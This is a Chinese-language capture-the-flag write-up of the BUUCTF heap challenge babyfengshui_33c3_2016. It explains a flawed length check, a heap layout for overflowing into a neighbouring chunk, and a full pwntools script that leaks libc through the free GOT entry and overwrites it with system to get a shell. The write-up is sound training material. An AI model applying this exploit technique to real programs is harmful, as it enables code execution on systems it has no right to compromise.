本文主要是介绍BUUCTF pwn babyfengshui_33c3_2016(简单堆),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 文件分析
0x02 运行
程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。
0x03 静态分析
主函数:
void __cdecl __noreturn main()
{char v0; // [esp+3h] [ebp-15h]int v1; // [esp+4h] [ebp-14h]size_t v2; // [esp+8h] [ebp-10h]unsigned int v3; // [esp+Ch] [ebp-Ch]v3 = __readgsdword(0x14u);setvbuf(stdin, 0, 2, 0);setvbuf(stdout, 0, 2, 0);while ( 1 ){puts("0: Add a user");puts("1: Delete a user");puts("2: Display a user");puts("3: Update a user description");puts("4: Exit");printf("Action: ");if ( __isoc99_scanf("%d", &v1) == -1 )break;if ( !v1 ){printf("size of description: ");__isoc99_scanf("%u%c", &v2, &v0);Add(v2);}if ( v1 == 1 ){printf("index: ");__isoc99_scanf("%d", &v2);delete(v2);}if ( v1 == 2 ){printf("index: ");__isoc99_scanf("%d", &v2);display(v2);}if ( v1 == 3 ){printf("index: ");__isoc99_scanf("%d", &v2);update(v2);}if ( v1 == 4 ){puts("Bye");exit(0);}if ( (unsigned __int8)count > 49u ){puts("maximum capacity exceeded, bye");exit(0);}}exit(1);
}Add:
Add函数进行了两次堆的申请,并且把第一次申请的堆的地址赋值到第二次申请的堆的数据之中,由此可以判断出此函数利用了一个结构体,而第二次申请的堆的大小是固定的,可以得到结构体的数据结构:
struct Node{char * description;char name[0x7C];
}
s便是description的空间地址,而v2则是结构体的空间。
delete:
检查空间是否存在,free掉前面申请的空间并赋值为0。
display:
显示数据
update:
更新description里面的数据,需要注意的是其检查数据长度的方式(13行),是以description堆块的起始地址和name的起始地址之间的长度。
0x04 思路
由于update函数中的判断数据长度是否合法的方式有问题,可以通过申请连续小堆块,再释放申请大堆块的方式绕过。
具体方式如下:
1.首先申请连续的3个结构体,description部分空间大小为0x80,方便计算:
| 堆块 0des 0x80 | 堆块0 node 0x80 | 堆块1 des 0x80 | 堆块1 node 0x80 | 堆块2 des 0x8 | 堆块2 node 0x80 |
|---|
2.释放第一个结构体,得到一个空闲的0x100的堆块:
| 空闲堆块 0x100 | 堆块1 des 0x80 | 堆块1 node 0x80 | 堆块2 des 0x8 | 堆块2 node 0x80 |
|---|
3.申请新的结构体,其description部分为0x100,根据linux堆的性质,会优先分配空闲的堆块,释放得到的空闲堆块可以满足description的空间需求,而node的空间需要新分配,得到下面的结构:
| 堆块 0 des 0x100 | 堆块1 des 0x80 | 堆块1 node 0x80 | 堆块2 des 0x8 | 堆块2 node 0x80 | 堆块0 node 0x80 |
|---|
根据判断数据合法长度的方式,堆块0的des和name相差地址为之间堆块的长度的和,绕过了长度判断,可以利用堆溢出来修改中间堆块的块首,得到libc,然后得到shell。
新版的libc其堆的机制有所改变(libc2.26及以上的,增加了tcache机制),不能以此利用
0x05 exp
from pwn import *
from LibcSearcher import *context.log_level = 'debug'#p = process('./babyfengshui')
p = remote('node3.buuoj.cn', 28668)
elf = ELF('babyfengshui')def Add(size, length, text):p.sendlineafter("Action: ", '0')p.sendlineafter("description: ", str(size))p.sendlineafter("name: ", 'qin')p.sendlineafter("length: ", str(length))p.sendlineafter("text: ", text)def Del(index):p.sendlineafter("Action: ", '1')p.sendlineafter("index: ", str(index))def Dis(index):p.sendlineafter("Action: ", '2')p.sendlineafter("index: ", str(index))def Upd(index, length, text):p.sendlineafter("Action: ", '3')p.sendlineafter("index: ", str(index))p.sendlineafter("length: ", str(length))p.sendlineafter("text: ", text)Add(0x80, 0x80, 'qin')
Add(0x80, 0x80, 'qin')
Add(0x8, 0x8, '/bin/sh\x00')
Del(0)#注意堆块块首的长度
Add(0x100, 0x19c, "a"*0x198+p32(elf.got['free']))
Dis(1)
p.recvuntil("description: ")
free_addr = u32(p.recv(4))libc = LibcSearcher('free', free_addr)
libc_base = free_addr - libc.dump('free')
sys_addr = libc_base + libc.dump('system')#堆块1的description指针已经被修改为free的地址,则可以将free地址内的内容替换为system
Upd(1, 0x4, p32(sys_addr))
Del(2)p.interactive()
一个简单的网络安全公众号,欢迎各位朋友们关注!
这篇关于BUUCTF pwn babyfengshui_33c3_2016(简单堆)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
